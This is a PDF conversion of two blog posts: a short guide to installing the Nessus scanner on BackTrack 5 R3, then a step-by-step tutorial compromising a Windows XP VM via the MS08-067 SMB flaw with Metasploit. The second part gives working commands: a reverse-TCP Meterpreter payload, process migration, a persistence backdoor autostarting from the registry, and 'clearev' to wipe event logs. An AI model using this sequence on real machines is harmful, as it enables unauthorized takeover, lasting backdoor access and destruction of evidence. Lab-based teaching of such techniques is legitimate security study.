-
8/12/2019 Ci t phn mm Nessus trn backtrack
1/8
Ci t phn mm Nessus trn backtrack
Mar
19
How to Install Nessus on Backtrack 5 R3
Nessus is a network vulnerabi l i ty scanning program.It is free
for personal use. Its can detect vulnerabilities onthe systems.
Nessus is the most popular vulnerability scannerin the computer
security. Nessus allows scansfor vulnerabilities, misconfiguration,
default passwords / common passwords / blank passwords on some
systemaccounts, etc. You can use Nessus to scan your system and
patch the vulnerability. If you want install Nessus onBacktrack 5
R3 first thing to do is download it
fromhttp://www.tenable.com/products/nessus/
Download the Nessus package
fromhttp://www.tenable.com/products/nessus/and install it manually.
Read mypost before about How toInstall Package on Backtrack 5after
you install it, skip to step two. If you have internetconnection
you can install Nessus from repository. Run this command to
download and install Nessus.apt-get install nessus
After install it, create an account with adduser command like
this/opt/nessus/sbin/nessus-adduser
Now register to Nessus website http://www.nessus.org/register/
to get your activation code that send to youremail. After you get
the key, run this command, fill change xxxx-xxxx-xxxx-xxxx-xxxx
with your key/opt/nessus/bin/nessus-fetch --register
xxxx-xxxx-xxxx-xxxx-xxxx
It will take some time because plugin is being updated. After
the update complete, run your Nessus/etc/init.d/nessusd start
Then open your browser and type this in the URL of the
browserhttps://localhost:8834/
Nessus will run on the secure channel https and on the port
number 8834. Now try and use Nessus for your ownrisk :-D
http://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttps://www.blogger.com/%C2%A0http:/www.tenable.com/products/nessushttps://www.blogger.com/%C2%A0http:/www.tenable.com/products/nessushttp://www.tenable.com/products/nessus/http://www.tenable.com/products/nessus/http://www.tenable.com/products/nessus/http://back-track-linux.blogspot.com/2012/08/how-to-install-package-on-backtrack-5.htmlhttp://back-track-linux.blogspot.com/2012/08/how-to-install-package-on-backtrack-5.htmlhttp://back-track-linux.blogspot.com/2012/08/how-to-install-package-on-backtrack-5.htmlhttp://2.bp.blogspot.com/-UOAdeHCZQ94/UHFBb4gsskI/AAAAAAAAASc/g9BCNUSOWVs/s1600/nessus.jpghttp://back-track-linux.blogspot.com/2012/08/how-to-install-package-on-backtrack-5.htmlhttp://www.tenable.com/products/nessus/https://www.blogger.com/%C2%A0http:/www.tenable.com/products/nessushttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.htmlhttp://securityeraddn.blogspot.com/2013/03/how-to-install-nessus-on-backtrack-5-r3.html
-
8/12/2019 Ci t phn mm Nessus trn backtrack
2/8
http://3.bp.blogspot.com/-K4PJuydS_FE/UHFDHG0S6DI/AAAAAAAAAS0/iuHw6Ou-Y6s/s1600/installing+nessus+on+backtrack+5+r3+2.pnghttp://1.bp.blogspot.com/-9d9NVFssfa8/UHFCx0GHKuI/AAAAAAAAASs/xHweNw4f1Q0/s1600/installing+nessus+on+backtrack+5+r3+1.pnghttp://4.bp.blogspot.com/-iI6B_PoFa5g/UHFCk3J7u5I/AAAAAAAAASk/I1lJtflmXjc/s1600/installing+nessus+on+backtrack+5+r3.pnghttp://3.bp.blogspot.com/-K4PJuydS_FE/UHFDHG0S6DI/AAAAAAAAAS0/iuHw6Ou-Y6s/s1600/installing+nessus+on+backtrack+5+r3+2.pnghttp://1.bp.blogspot.com/-9d9NVFssfa8/UHFCx0GHKuI/AAAAAAAAASs/xHweNw4f1Q0/s1600/installing+nessus+on+backtrack+5+r3+1.pnghttp://4.bp.blogspot.com/-iI6B_PoFa5g/UHFCk3J7u5I/AAAAAAAAASk/I1lJtflmXjc/s1600/installing+nessus+on+backtrack+5+r3.pnghttp://3.bp.blogspot.com/-K4PJuydS_FE/UHFDHG0S6DI/AAAAAAAAAS0/iuHw6Ou-Y6s/s1600/installing+nessus+on+backtrack+5+r3+2.pnghttp://1.bp.blogspot.com/-9d9NVFssfa8/UHFCx0GHKuI/AAAAAAAAASs/xHweNw4f1Q0/s1600/installing+nessus+on+backtrack+5+r3+1.pnghttp://4.bp.blogspot.com/-iI6B_PoFa5g/UHFCk3J7u5I/AAAAAAAAASk/I1lJtflmXjc/s1600/installing+nessus+on+backtrack+5+r3.png
-
8/12/2019 Ci t phn mm Nessus trn backtrack
3/8
Exploit Windows XP SP3 Using Metasploit (msfconsole)
Holla Guys,
Lets do some exploitation. :D
1. Startup your XP in Virtualbox
(for those who haven't installed xp in virtualbox can see the
tutorial here
2. Make sure that the host(BT 5r1) and the XP are connected each
other.
3. Lets scan the target to see the services running
# nmap -A 192.168.56.101
Spoiler:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-28 05:25
WIT
Nmap scan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 997 closed portsPORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:91:01:D1 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server
2003
http://1.bp.blogspot.com/-MaLHEiIrN9o/UHFDsUYF0jI/AAAAAAAAAS8/y8AIUmdaPLQ/s1600/installing+nessus+on+backtrack+5+r3+3.png
-
8/12/2019 Ci t phn mm Nessus trn backtrack
4/8
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: YUDHI-HOME, NetBIOS user: ,
NetBIOS MAC: 08:00:27:91:01:d1 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\YUDHI-HOME
|_ System time: 2012-01-28 05:25:50 UTC+7
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect
results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.64 seconds
4. Lets scan some vulnerabilities using Nessus.
(for how to use nessus you can go here)
After the scan finished, lets analyze the report.
Great, it says that our target smb service is vulnerable and its
vulnerability levelis high too.
pay attention to this
because we have to use it to search for the right exploit. or
simply look at there.
That plugin name is the hint to search for the right
exploit.
4. Lets search the exploit to attack that vulnerability on
metasploit. Start your
metasploit console.
-
8/12/2019 Ci t phn mm Nessus trn backtrack
5/8
# msfconsole
To search for exploit type
meterpreter > search platform:windows type:exploit
cve:-2008-4834
app:server path:exploit/windows/smb
explanation : for the search sytax type "search -h"
platform : because the target is a windows system we choose
this.
type : because we only want to search an exploit, we choose
exploit for this.
cve : fill with the data from nessus scan.
app : server attack side.
path : because we want to search only exploits for smb set the
path to this is
right.
Hit, enter.
Notice that there is this exploit there, "ms08_067_netapi" that
located at
exploit/windows/smb/ms08_067_netapi. The one that have the same
name as the
plugin name that we've discovered with the nessus earlier.
Important to know
that almost all windows is vulnurable with this exploit. Lets
use it.
5. Type these :
use exploit/windows/smb/ms08_067_netapi
explanation : by typing this we set the metasploit to use this
exploit on the
target.
set RHOST 192.168.56.101
explanation : RHOST is the target, set the ip with the target
that you want to
attack.
set PAYLOAD windows/meterpreter/reverse_tcp
-
8/12/2019 Ci t phn mm Nessus trn backtrack
6/8
explanation : meterpreter is the payload that we want to use.
I'll explain more
about payload later.
set LHOST 192.168.56.1
explanation : LHOST is the Listener HOST. this is us. set with
our IP.
exploit
launch the attack.
6.If everything is done correctly, a meterpreter shell will
appear on the target
system.
7. From this point, the server is under our control. But to
prevent the user kill
our meterpreter process we must quickly migrate to the other
services running.
To show the running process on the target system type
meterpreter > ps
search for explorer.exe process since it is the most important
services on
windows and identify the process number. Lets migrate to that
service.
meterpreter > migrate [PID]
You can do whatever you want on the system now.
8. Ok, next step is placing a backdoor for later connection.
Good for us
metasploit also provided the script for it called "persistence".
Lets see the usage
of this script.
meterpreter > run persistence -h
-
8/12/2019 Ci t phn mm Nessus trn backtrack
7/8
Lets execute it.
meterpreter > run persistence -A -X -p 10000 -r
192.168.56.1
And thats it. A backdoor have been created on the target
system.
(the backdoor will be located at C:\WINDOWS\TEMP directory. It
is a .vbs file.
The scirpt will also create an autostart in the registry key
HKLM\Software\Microsoft\CurrentVersion\Run\XXXXX(random). So,
when
the pc start, the backdoor will also active. For tutorial to use
the backdoor you
can go here)
9. And don't forget to clear our hacking tracks.
meterpreter > clearev
To exit the shell just type "exit".
The elaboration from this attack based on the hacking
methodology is
1. Information Gathering
Using nmap get the information.
2. Service Enumeration
Using nmap to see the services running.
3. Vulnerability Assessment
Using nessus to scan the vulnerability and metasploit to search
the exploit.
4. ExploitUsing metasploit on console mode to take over the
system.
5. Backdooring
Using metaspoit 'persistance' script to create backdoor.
6. Housekeeping
Using metasploit 'crearev' to clear the tracks.
Hope this helps. :)
Lets make the History!!
-
8/12/2019 Ci t phn mm Nessus trn backtrack
8/8
Read more:
http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3-
using-metasploit.html#ixzz2wbooxOrw
